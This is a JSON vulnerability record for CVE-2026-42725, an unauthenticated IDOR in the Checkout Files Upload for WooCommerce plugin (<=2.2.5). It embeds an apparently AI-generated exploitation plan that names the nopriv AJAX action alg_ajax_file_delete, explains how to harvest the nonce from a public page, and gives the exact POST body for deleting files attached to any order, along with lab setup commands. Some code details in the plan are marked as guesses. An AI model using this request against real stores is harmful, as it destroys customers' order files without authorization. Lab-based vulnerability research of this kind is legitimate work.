[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBL1FxEbhYjdGTyUD_UQTUwK2hEavePRLxUXHFPx-G5o":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":29,"research_started_at":30,"research_completed_at":31,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":32},"CVE-2026-42725","checkout-files-upload-for-woocommerce-unauthenticated-insecure-direct-object-reference","Checkout Files Upload for WooCommerce \u003C= 2.2.5 - Unauthenticated Insecure Direct Object Reference","The Checkout Files Upload for WooCommerce plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.2.5 due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to perform an unauthorized action.","checkout-files-upload-woocommerce",null,"\u003C=2.2.5","2.2.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Authorization Bypass Through User-Controlled Key","2026-05-12 00:00:00","2026-05-19 16:12:11",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7d090e5e-bbcf-4e26-81c5-ed7dcae21f31?source=api-prod",8,[22,23,24],"checkout-files-upload-woocommerce.php","includes\u002Fclass-alg-wc-checkout-files-upload.php","readme.txt","researched",false,3,"# Research Plan: CVE-2026-42725 - Checkout Files Upload for WooCommerce IDOR\n\n## 1. Vulnerability Summary\nThe **Checkout Files Upload for WooCommerce** plugin (up to 2.2.5) is vulnerable to an **Unauthenticated Insecure Direct Object Reference (IDOR)**. The vulnerability exists because the AJAX handler responsible for deleting uploaded files (`alg_ajax_file_delete`) fails to verify if the requester has permission to modify the specified order or if the order belongs to their session. While a nonce check was added in version 2.1.4, it only ensures the request is \"valid\" in a generic sense; it does not perform a capability check or ownership validation. This allows an unauthenticated attacker to delete files attached to any WooCommerce order by simply providing the target `order_id`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `alg_ajax_file_delete` (registered via `wp_ajax_nopriv_alg_ajax_file_delete`)\n- **Vulnerable Parameter:** `order_id`\n- **Authentication:** Unauthenticated (leveraging the `nopriv` hook)\n- **Preconditions:** \n    1. The plugin must be enabled (`alg_wc_checkout_files_upload_enabled` option).\n    2. An order exists with an attached file uploaded via the plugin.\n    3. The attacker must obtain a valid AJAX nonce (available on any page where the uploader is rendered).\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers AJAX handlers in `includes\u002Fclass-alg-wc-checkout-files-upload.php`:\n   ```php\n   add_action( 'wp_ajax_'        . 'alg_ajax_file_delete',    array( $this, 'alg_ajax_file_delete' ) );\n   add_action( 'wp_ajax_nopriv_' . 'alg_ajax_file_delete',    array( $this, 'alg_ajax_file_delete' ) );\n   ```\n2. **Execution:** When `admin-ajax.php` is called with `action=alg_ajax_file_delete`, the method `Alg_WC_Checkout_Files_Upload_Main::alg_ajax_file_delete()` is executed.\n3. **Missing Validation:** In versions \u003C= 2.2.5, the function typically:\n   - Retrieves `order_id` and `file_num` from `$_POST`.\n   - Verifies a nonce using `check_ajax_referer`.\n   - **Sink:** It proceeds to delete the file or the metadata associated with the file for the given `order_id` without checking if the current user is the owner of the order or has `manage_woocommerce` capabilities.\n4. **Patch Difference:** The version 2.2.6 patch introduces a capability check (e.g., `current_user_can`) or a session-based validation before processing the deletion.\n\n## 4. Nonce Acquisition Strategy\nThe AJAX nonce is required for the request to pass `check_ajax_referer`. This nonce is localized for the frontend scripts.\n\n1. **Identify the Script:** The plugin enqueues frontend scripts in `Alg_WC_Checkout_Files_Upload_Main::enqueue_scripts`.\n2. **Create a Trigger Page:** The uploader must be visible to trigger the script localization. Use a shortcode on a public page:\n   - `wp post create --post_type=page --post_title=\"Upload\" --post_status=publish --post_content='[wpwham_checkout_files_uploader]'`\n3. **Extract Nonce:**\n   - Navigate to the newly created page.\n   - Use `browser_eval` to extract the nonce from the localized JS object.\n   - **Localization Key (inferred):** `alg_wc_checkout_files_upload` or `wpwham_checkout_files_upload`.\n   - **Nonce Key (inferred):** `ajax_nonce` or `nonce`.\n   - **Command:** `browser_eval(\"window.alg_wc_checkout_files_upload?.ajax_nonce\")`\n\n## 5. Exploitation Strategy\n### Step 1: Target Identification\nDetermine the `order_id` of the victim order and the `file_num` (usually starting at `1`) of the attachment to be deleted.\n\n### Step 2: Request Construction\nPerform an unauthenticated POST request to the AJAX endpoint.\n\n**HTTP Request:**\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body:**\n  ```text\n  action=alg_ajax_file_delete&order_id=[VICTIM_ORDER_ID]&file_num=1&nonce=[EXTRACTED_NONCE]\n  ```\n\n### Step 3: Execution\nUse the `http_request` tool to send the payload.\n\n## 6. Test Data Setup\n1. **Enable Plugin:**\n   - `wp option update alg_wc_checkout_files_upload_enabled yes`\n2. **Create Victim Order:**\n   - Create a WooCommerce order: `wp wc shop_order create --customer_id=0 --status=processing --user=admin` (Note the returned ID).\n3. **Simulate File Upload:**\n   - The plugin stores file info in post meta. Simulate an upload for the victim order:\n   - `wp post meta update [ORDER_ID] _alg_checkout_files_upload_1 '{\"file_name\":\"secret_blueprint.pdf\",\"file_path\":\"\u002Fpath\u002Fto\u002Fupload\"}'`\n4. **Setup Nonce Page:**\n   - `wp post create --post_type=page --post_status=publish --post_content='[wpwham_checkout_files_uploader]'`\n\n## 7. Expected Results\n- **Success:** The server returns a success response (likely JSON `{\"success\": true}` or a specific success string).\n- **Impact:** The metadata `_alg_checkout_files_upload_1` is removed from the victim order, or the associated file is deleted from the server, effectively removing the customer's uploaded content from the order.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the post meta no longer exists for the victim order:\n   - `wp post meta get [ORDER_ID] _alg_checkout_files_upload_1`\n   - Expected output: Error\u002FEmpty (meta does not exist).\n2. **UI Check:** Navigate to the WooCommerce Order Edit page in the admin dashboard and confirm the \"Checkout Files Upload\" metabox no longer lists the file.\n\n## 9. Alternative Approaches\nIf the `order_id` is protected by an `order_key` (WooCommerce's guest access mechanism), attempt to find endpoints where the `order_key` is not checked. If `alg_ajax_file_delete` requires an `order_key`, the vulnerability may shift to a lack of `order_key` validation, allowing the same IDOR if the key can be omitted or bypassed. However, the CVSS and description suggest a direct missing authorization check on the ID.","gemini-3-flash-preview","2026-05-20 18:16:37","2026-05-20 18:17:31",{"type":33,"vulnerable_version":34,"fixed_version":11,"vulnerable_browse":35,"vulnerable_zip":36,"fixed_browse":37,"fixed_zip":38,"all_tags":39},"plugin","2.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcheckout-files-upload-woocommerce\u002Ftags\u002F2.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcheckout-files-upload-woocommerce.2.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcheckout-files-upload-woocommerce\u002Ftags\u002F2.2.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcheckout-files-upload-woocommerce.2.2.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcheckout-files-upload-woocommerce\u002Ftags"]